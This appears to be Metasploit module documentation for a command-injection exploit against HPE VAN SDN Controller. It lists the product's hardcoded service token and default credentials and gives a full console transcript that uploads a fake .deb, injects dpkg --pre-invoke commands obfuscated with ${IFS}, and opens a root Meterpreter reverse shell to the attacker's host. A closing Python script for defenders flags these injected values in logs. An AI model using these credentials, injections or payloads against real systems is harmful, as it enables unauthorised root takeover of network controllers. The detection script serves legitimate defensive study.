## Introduction

This module exploits a hardcoded service token or default credentials in
HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.

A root command injection was discovered in the uninstall action's name
parameter, obviating the need to use sudo for privilege escalation.

If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD`
are used for authentication instead, and an additional login request is
sent to obtain an auth token.

## Setup

Follow <http://h22208.www2.hpe.com/eginfolib/networking/docs/sdn/sdnc2_6/5998-8473install/content/s_download_sw.html>.

Tested on 2.7.18.0503.

## Options

**RPORT**

Set this to the port for the REST API, usually 8081.

**WEBUI_PORT**

Set this to the port for the web UI, usually 8443.

**TOKEN**

Set this to the service token. Defaults to `AuroraSdnToken37`.

**USERNAME**

Set this to the service username. Defaults to `sdn`.

**PASSWORD**

Set this to the service password. Defaults to `skyline`.

## Usage

```
msf5 > use exploit/linux/http/hp_van_sdn_cmd_inject
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set rhosts 192.168.56.102
rhosts => 192.168.56.102
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set target Linux Dropper
target => Linux Dropper
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with service token AuroraSdnToken37
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500
[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Debian 8 (Linux 4.4.0-2-amd64-hlinux)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > set token ""
token =>
msf5 exploit(linux/http/hp_van_sdn_cmd_inject) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Authenticating with creds sdn:skyline
[+] Retrieved auth token 26d7b53a73a9455eae63c346321bfe31
[*] Uploading payload as fake .deb
[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb
[*] Renaming payload and executing it
[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l
[*] Sending stage (812100 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500
[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l

meterpreter >
```
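As an added defender-side example (not part of the module or its documentation), the following Python scans uninstall log lines for the hallmarks of the injection shown in the transcript above: a `--pre-invoke`/`--post-invoke` dpkg hook inside the package name, `${IFS}` used as a whitespace substitute, or any value that is not a valid Debian package name, and decodes `${IFS}` so the analyst sees the command as the shell ran it. The `uninstall name=<value>` log format and the sample lines are constructed for illustration and are not the controller's real log format.

```python
import re

# Debian package names: lowercase letters, digits, '+', '-', '.'; at least two characters.
VALID_PKG_NAME = re.compile(r"^[a-z0-9][a-z0-9+.-]+$")
DPKG_HOOK = re.compile(r"--(pre|post)-invoke=")
IFS_TOKEN = re.compile(r"\$\{IFS\}|\$IFS\b")
NAME_PARAM = re.compile(r"name=(\S*)")

# Constructed sample lines in a hypothetical "uninstall name=<value>" format
# (not the controller's real log format); the injected values mirror the
# dpkg hooks shown in the module output above.
SAMPLE_LOG = """\
2018-07-03T18:23:07 uninstall name=sdn-app-foo
2018-07-03T18:23:08 uninstall name=--pre-invoke=mv${IFS}/var/lib/sdn/uploads/a.deb${IFS}/var/lib/sdn/uploads/a${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/a
2018-07-03T18:23:09 uninstall name=--pre-invoke=/var/lib/sdn/uploads/a
2018-07-03T18:25:00 uninstall name=sdn-app-bar
"""

def decode_ifs(value):
    """Replace ${IFS} / $IFS (the shell's word separator) with spaces so the
    analyst sees the command as the shell actually ran it."""
    return IFS_TOKEN.sub(" ", value)

def classify_name(value):
    """Return the reasons an uninstall name looks injected (empty list if benign)."""
    reasons = []
    if DPKG_HOOK.search(value):
        reasons.append("dpkg --pre/--post-invoke hook in package name")
    if IFS_TOKEN.search(value):
        reasons.append("${IFS} whitespace substitution")
    if not VALID_PKG_NAME.match(value):
        reasons.append("not a valid Debian package name")
    return reasons

def find_injected_uninstalls(log_text):
    """Return a finding for every logged uninstall whose name parameter is suspicious."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = NAME_PARAM.search(line)
        if not m:
            continue
        value = m.group(1)
        reasons = classify_name(value)
        if reasons:
            findings.append({"line": lineno, "name": value,
                             "decoded": decode_ifs(value), "reasons": reasons})
    return findings
```

Each finding's `decoded` field is the argument string dpkg received (prefix it with `dpkg -r` to reconstruct the full command), which is what to pivot on when hunting for the dropped file under `/var/lib/sdn/uploads`.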
